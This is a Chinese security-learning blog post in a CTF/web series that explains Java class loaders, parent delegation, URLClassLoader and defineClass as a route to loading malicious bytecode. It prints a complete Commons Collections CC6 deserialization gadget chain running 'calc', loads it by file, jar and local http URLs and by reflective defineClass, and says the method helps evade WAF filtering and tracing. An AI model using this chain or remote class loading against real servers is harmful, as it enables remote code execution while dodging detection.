java类加载和双亲委派及加载恶意类代码应用

已于 2024-07-31 19:09:38 修改
阅读量450 收藏 4
点赞数 6
分类专栏: ctf web 水鸡 文章标签: java python 开发语言
于 2024-07-31 16:29:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51796436/article/details/140826264
版权

前面的CC1和CC6,都是在Runtime.exec执行命令。如果WAF过滤了Runtime就寄,而且用命令的方式写入shell进行下一步利用,在流量中一个数据包就能把你的行为全部看完,很容易被分析出来。

如果用恶意字节码加载的方式,我们的流量会更乱,溯源更麻烦。而且最后触发点为defineClass,解决了过滤Runtime和exec的问题。

如果要学动态类加载,那一定绕不开类加载器的双亲委派机制

https://javaguide.cn/java/jvm/classloader.html#%E7%B1%BB%E5%8A%A0%E8%BD%BD%E5%99%A8%E6%80%BB%E7%BB%93

也可以尝试自己调用ClassLoader.loadClass()进行调试(普通步入进不去,需要强制步入),但是不推荐,脑子会被搞得很乱。

Java双亲委派类加载

JVM 中内置了三个重要的 ClassLoader

  1. BootstrapClassLoader(启动类加载器):最顶层的加载类,由 C++实现,通常表示为 null,并且没有父级,主要用来加载 JDK 内部的核心类库( %JAVA_HOME%/lib目录下的 rt.jarresources.jarcharsets.jar等 jar 包和类)以及被 -Xbootclasspath参数指定的路径下的所有类。
  2. ExtensionClassLoader(扩展类加载器):主要负责加载 %JRE_HOME%/lib/ext 目录下的 jar 包和类以及被 java.ext.dirs 系统变量所指定的路径下的所有类。
  3. AppClassLoader(应用程序类加载器):面向我们用户的加载器,负责加载当前应用 classpath 下的所有 jar 包和类。

除了 BootstrapClassLoader 是 JVM 自身的一部分之外,其他所有的类加载器都是在 JVM 外部实现的,并且全都继承自 ClassLoader抽象类。

image-20240731105932213

ClassLoader 类有两个关键的方法:

  • protected Class loadClass(String name, boolean resolve):加载指定二进制名称的类,实现了双亲委派机制 。name 为类的二进制名称,resolve 如果为 true,在加载时调用 resolveClass(Class<?> c) 方法解析该类。
  • protected Class findClass(String name):根据类的二进制名称来查找类,默认实现是空方法。

image-20240731105804759

双亲委派模型的执行流程:

  • 在类加载的时候,系统会首先判断当前类是否被加载过。已经被加载的类会直接返回,否则才会尝试加载(每个父类加载器都会走一遍这个流程)。
  • 类加载器在进行类加载的时候,它首先不会自己去尝试加载这个类,而是把这个请求委派给父类加载器去完成(调用父加载器 loadClass()方法来传递类)。这样的话,所有的请求最终都会传送到顶层的启动类加载器 BootstrapClassLoader 中。
  • 只有当父加载器反馈自己无法完成这个加载请求(它的搜索范围中没有找到所需的类)时,子加载器才会尝试自己去加载(调用自己的 findClass() 方法来加载类)。
  • 如果子类加载器也无法加载这个类,那么它会抛出一个 ClassNotFoundException 异常。

由于loadClass是传递,所以只有AppClassLoader重写了loadClass,因为BootstrapClassLoader是C++实现的,已经无需由ExtClassLoader传递上去。

image-20240731113942238

那为什么两个类都没实现findClass来加载类呢?实际上两个类都继承了URLClassLoader,调用URLClassLoader#findClass来通过路径加载类。

类加载器之URLClassLoader

上文的双亲委派,类加载器之间并不是继承的关系,而是使用组合关系来复用父加载器。

public abstract class ClassLoader {
  ...
  // 组合
  private final ClassLoader parent;
  protected ClassLoader(ClassLoader parent) {
       this(checkCreateClassLoader(), parent);
  }
  ...
}

真实的继承关系如图:

image-20240731111552787

AppClassLoader和ExtClassLoader都是Launcher的静态内部类,继承自URLClassLoader

  • SecureClassLoader:扩展了ClassLoader,并为定义具有相关代码源和权限的类提供了额外支持,这些代码源和权限默认情况下由系统策略检索。
  • URLClassLoader:继承自SecureClassLoader,支持从jar文件和文件夹中获取class,继承于Classloader,加载时首先去Classloader里判断是否由启动类加载器加载过。

Class.forName()这个方法只能创建程序中已经引用的类,如果我们需要动态加载程序外的类,Class.forName()是不够的,这个时候就是需要使用URLClassLoader的时候。

把CC6改个构造函数:

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.util.HashMap;
import java.util.Map;


public class CC6TiedMapEntry {
    public CC6TiedMapEntry() throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object, Object> map = new HashMap<>();
        Map lazyMap = LazyMap.decorate(map, new ConstantTransformer("godown"));
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "test1");
        HashMap<Object, Object> hashMap = new HashMap<>();
        hashMap.put(tiedMapEntry, "test2");
        map.remove("test1");
        Class lazymapClass = lazyMap.getClass();
        Field factory = lazymapClass.getDeclaredField("factory");
        factory.setAccessible(true);
        Field modifiersField = Field.class.getDeclaredField("modifiers");
        modifiersField.setAccessible(true);
        modifiersField.setInt(factory, factory.getModifiers() & ~Modifier.FINAL);
        factory.set(lazyMap, chainedTransformer);
        serialize(hashMap);
        unserialize("cc6.ser");
    }
    public static void serialize(Object obj) throws Exception {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("cc6.ser"));
        oos.writeObject(obj);
        oos.close();
    }
    public static Object unserialize(String filename) throws Exception {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename));
        Object obj = ois.readObject();
        ois.close();
        return obj;
    }
}

file协议

构建后放到指定的项目外目录,测试加载项目外路径的类

image-20240731151651287

把项目文件下的CC6TiedMapEntry文件删去

用下列代码就能远程加载类

public class CC3TemplatesImpl {
    public static void main(String[] args) throws Exception {
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("file:///E:\\CODE_COLLECT\\")});
        Class<?> clazz = urlClassLoader.loadClass("CC6TiedMapEntry");
        clazz.newInstance();
    }
}

image-20240731153412148

jar协议

上面的代码用的file协议,实际上jar协议和http协议也可以加载:

先创建工件,然后把CC6TiedMapEntry.class加入jar包下

image-20240731154736468

构建工件

image-20240731154821585

同理,传到目录下:

image-20240731154904750

public class CC3TemplatesImpl {
    public static void main(String[] args) throws Exception {
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("jar:file:///E:\\CODE_COLLECT\\CC6TiedMapEntry.jar!/")});
        Class<?> clazz = urlClassLoader.loadClass("CC6TiedMapEntry");
        clazz.newInstance();
    }
}

用上述代码进行加载,也是成功加载:

image-20240731154932573

http协议

http就很简单了,python开个服务直接请求。

image-20240731162405290

public class CC3TemplatesImpl {
    public static void main(String[] args) throws Exception {
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("http://127.0.0.1:9999/")});
        Class<?> clazz = urlClassLoader.loadClass("CC6TiedMapEntry");
        clazz.newInstance();
    }
}

当然也可以http搭配file和jar协议使用,自行发挥吧。

源码详解

除此以外还有一种更底层的代码进行类加载。我们深入分析一下下列代码是怎么加载类的。

public static void main(String[] args) throws Exception {
    ClassLoader classLoader = ClassLoader.getSystemClassLoader();
    Class<?> clazz = classLoader.loadClass("org.example.CC6TiedMapEntry");
    clazz.newInstance();
}

ClassLoader.getSystemClassLoader()返回的是系统类加载器,通常是一个Launcher$AppClassLoader 的实例

我们指定的类先进入单参数的ClassLoader#loadClass,因为AppClassLoader,父类URLClassLoader及其父类SecureClassLoader里并没有单参数loadClass,但是SecureClassLoader继承了ClassLoader

image-20240731173028112

该loadClass调用了另一个双参数的loadClass,尽管ClassLoader实现了这个双参数的loadClass,但根据多态性原则,还是交给重载了该方法的子类AppClassLoader运行。

在AppClassLoader中调用了父类的loadClass,也就是ClassLoader的loadClass

image-20240731175928852

于是开始双亲委派

image-20240731180116014

由于不在指定的目录下,BootstrapLoader和ExtClassLoader都加载不了,最后传回了AppClassLoader。

AppClassLoader#findClass不存在,交由其父类URLClassLoader#findClass处理。

于是在该方法中,获取了类路径,并调用defineClass加载字节码

image-20240731180720964

跟进defineClass,发现实际上是调用了

image-20240731180820380

在ClassLoader#defineClass进行了字节码的加载,具体的实现在defineClass1这个C++实现方法中。

image-20240731181000728

这个过程不需要记住,只需要知道最后在ClassLoader#defineClass进行字节码的加载

调用过程:AppClassLoader#loadClass->ClassLoader#loadClass->双亲委派->AppClassLoader#findClass(无)->URLClassLoader#findClass->URLClassLoader#defineClass->ClassLoader#defineClass

双亲委派过程:检查是否加载过->ExtClassLoader#loadClass->BootstrapClassLoader->AppClassLoader#findClass

defineClass底层加载

既然最后类加载的地方是defineClass,那我们反射直接调用一遍该方法测试一下

image-20240731182329733

public static void main(String[] args) throws Exception {
    Class<ClassLoader> cl = ClassLoader.class;
    Method defineclassmethod = cl.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
    defineclassmethod.setAccessible(true);
    byte[] code = Files.readAllBytes(Paths.get("E:\\CODE_COLLECT\\CC6TiedMapEntry.class"));
    Class cc6Instance = (Class) defineclassmethod.invoke(ClassLoader.getSystemClassLoader(), "CC6TiedMapEntry", code, 0, code.length);
    cc6Instance.newInstance();
}

image-20240731183540038

可见,可以直接调用defineClass加载类。

尽管defineClass是protected final,其他地方依然有调用到该方法,让我们可以构造底层的恶意类加载攻击。

比如bcel,TemplatesImpl

image-20240731190735428

马戏团小丑
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java 类加载机制和反射详解及实例代码
08-31
类加载过程中,有一个重要的概念是**双亲委派模型**,即类加载请求会由子委托给父类加载,直到找到相应或者到达顶层的启动类加载器。这样保证了类加载的一致性和安全性。 **反射**是Java提供的一种强大的工具...
第23讲请介绍类加载过程,什么是双亲委派模型1
08-04
双亲委派模型是类加载机制的核心,它规定当类加载器尝试加载某个型时,除非父加载器找不到该型,否则任务会被委托给父加载器。这样可以避免的重复加载,确保所有都有统一的加载源,从而维护系统的一致性和...
Java编程进阶之路 04】深入探索:Java类加载器与双亲委派 & 打破双亲委派桎梏
weixin_40736233的博客
02-28 849
双亲委派模型是Java类加载机制中的一个重要概念,它保证了Java应用的安全和稳定。通过委派加载请求给父类加载器,可以避免的重复加载和保护系统的安全;通过实现代码的热部署,可以方便地更新运行中的代码。在Java生态系统中,各种型的类加载器都遵循这一模型,从而保证了Java应用的正常运行。 当然,双亲委派模型也不是完美无缺的。在某些特殊场景下(如需要加载不同版本的同一个),可能需要打破这一模型。
【JVM】(二)深入理解Java类加载机制与双亲委派模型
qq_61635026的博客
08-02 907
Java 中,类加载机制是 Java 虚拟机(JVM)的一个重要组成部分,它负责在运行时将 Java 类加载到内存中,并转换为可执行代码。理解类加载机制对于深入理解 Java 的运行机制和开发高质量的Java应用程序至关重要。 本文将深入探讨 Java类加载过程以及双亲委派模型。首先,我将详细介绍类加载过程的五个阶段。接下来,将重点介绍双亲委派模型以及它解决的问题。
类加载双亲委派模型
果酱 の 博客
07-24 2994
类加载双亲委派模型是Java类加载器的一种工作机制。它基于一种层次化的类加载器结构,通过委派的方式实现加载和查找。在这个模型中,每个类加载器都有一个父类加载器,当一个类加载器需要加载一个时,它首先将加载请求委派给父类加载器,只有当父类加载器无法完成加载任务时,才由当前类加载器自己去加载类加载双亲委派模型是Java类加载器的一种工作机制,通过委派的方式实现加载和查找。它通过隔离命名空间、提高安全性和鼓励代码复用等方式,为Java程序提供了良好的类加载机制。
【JVM】Java类加载器 和 双亲委派机制
qq_43325216的博客
03-29 914
当一个类加载器需要去加载时,会 首先委派给其父类加载器进行加载,如果父类加载器无法加载,才由该类加载器自己去加载但是如果只为了定义自定义加载器,建议重写findClass方法,这样不会破坏双亲委派机制。@Override// 核心库还是交给双亲委派机制进行加载// 通过的全限定名,找到字节码文件,并转为byte数组 不写了// 加载就是由defineClass这个底层方法实现的。
基础巩固之图解类加载过程与双亲委派模型
handy周
10-13 1114
类加载的时机 从被加载到虚拟机中内存开始,到卸载除内存为止,它的生命周期包括如下图所示: 上图中的 加载,验证,准备,初始化,卸载这5个步骤的顺序是固定的,加载器也必须按这个顺序开始,而解析阶段则不一定,它在某些情况下可以在初始化阶段之后再开始,这是为了支持Java语言的运行时绑定 加载过程 在加载阶段,虚拟机需要完成以下三件事情: 通过一个的全限定名来获取定义此的二进制字节流 ...
Java 类加载流程 双亲委派模型
知行合一
06-03 841
Java 中,加载是通过类加载器完成的,这个过程包括加载、连接(验证、准备、解析)和初始化三个主要阶段。
Java】深入了解双亲委派机制(常说的类加载机制)
weixin_45716968的博客
08-29 5160
ava虚拟机(JVM)的类加载机制是Java应用中不可或缺的一部分。本文将详细介绍JVM的双亲委派机制,并阐述各关键点。双亲委派机制(Parent-Delegate Model)是Java类加载器中采用的一种类加载策略。该机制的核心思想是:如果一个类加载器收到了类加载请求,默认先将该请求委托给其父类加载器处理。只有当父级加载器无法加载时,才会尝试自行加载。本文介绍了JVM的双亲委派机制,包括概念、类加载器层级关系、双亲委派流程及实例分析等方面的内容。
Java 类加载过程和双亲委派模型
刘皇叔说Java的博客
05-27 495
Java 中,装载器把一个装入 Java 虚拟机中,要经过三个步骤来完成:装载、链接和初始化,其中链接又可以分成校验、准备、解析Java类加载过程分为如下步骤:1.装载( 加载):查找和导入或接口的二进制数据;通过的全限定名获取的二进制字节流并存储在内存中。2.链接:执行下面的校验、准备和解析步骤,其中解析步骤是可以选择的;校验(Verification):检查导入或接口的二进制数据的正确性;验证字节流的正确性,包括文件格式、语法正确性等。
Java进阶】请介绍类加载过程,什么是双亲委派模型?
兴趣是最好的老师
07-18 264
梳理了一下类加载的过程,并针对 Java 新版中类加载机制发生的变化,进行了相对全面的总结,最后介绍了一个改善类加载速度的特性,希望对你有所帮助。
java 详解类加载器的双亲委派及打破双亲委派
08-31
双亲委派机制是Java设计类加载器的一种策略,其核心思想是:子类加载器优先将加载请求委托给父类加载器,只有当父类加载器无法加载时,子类加载器才会尝试自己加载。这种机制有助于维护Java程序的稳定性,避免重复...
深入理解java类加载机制
07-04
类加载器按照双亲委派模型工作,即子加载器先尝试加载,如果找不到则向上委托给父加载器,直到Bootstrap Class-Loader。这种设计保证了核心库的安全性,避免了的重复加载。 自定义类加载器允许开发者实现特定...
Java虚拟机----加载过程.docx
08-29
类加载器在类加载过程中起着关键作用,它们遵循双亲委派模型,从Bootstrap ClassLoader开始,向上委托,直到找到合适的类加载加载开发者还可以自定义类加载器,实现特定的加载逻辑。 总的来说,Java虚拟机的...
使用hutool工具判断字符串是否全部是字母(包括大小写),java判断字符串是否全部是字母(包括大小写)
qq_43700885的博客
07-29 452
1.导入hutool的maven依赖。2.复制一下代码执行。
java判断邮箱地址是否正确,使用hutool工具判断邮箱地址是否正确
qq_43700885的博客
07-29 254
1.导入hutool的maven依赖。2.直接复制一下代码运行。
Swagger使用Map接受参数时,页面如何显示具体参数及说
a1058926697的博客
07-26 623
后端使用Map接受参数,要求在swagger页面上显示具体的参数名称、型及说明。当Map接受参数数量少时,可以使用Swagger自带的注解。自定义注解 @ApiGlobalModel。编写处理注解对应的插件。
花几千上万学习Java,真没必要!(三十五)
最新发布
wehpd的博客
07-30 290
集合之Map
详细描述一下Java类加载过程的双亲委派机制
06-09
Java类加载过程的双亲委派机制是指:当一个需要被加载时,先委托其父类加载器去寻找该,若父类加载器没有找到该,则由当前类加载器自行去加载。 具体来说,双亲委派机制包含以下步骤: 1. 当一个需要被加载时,先检查该是否已经被加载过了,如果已经被加载,则直接返回已经加载的Class对象。 2. 如果该没有被加载,则将该加载请求委托给父类加载器去加载。如果父类加载器能够成功加载,则返回该的Class对象。 3. 如果父类加载器无法加载,则将该加载请求委托给当前类加载器去加载。如果当前类加载器能够成功加载,则返回该的Class对象。 4. 如果当前类加载器也无法加载,则将该加载请求继续向上一级父类加载器委托,直到最顶层的父类加载器(Bootstrap ClassLoader)。 5. 如果最顶层的父类加载器仍然无法加载,则抛出ClassNotFoundException异常。 双亲委派机制的优点在于可以保证Java的唯一性,避免重复加载,同时也可以保证Java的安全性,避免恶意加载
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值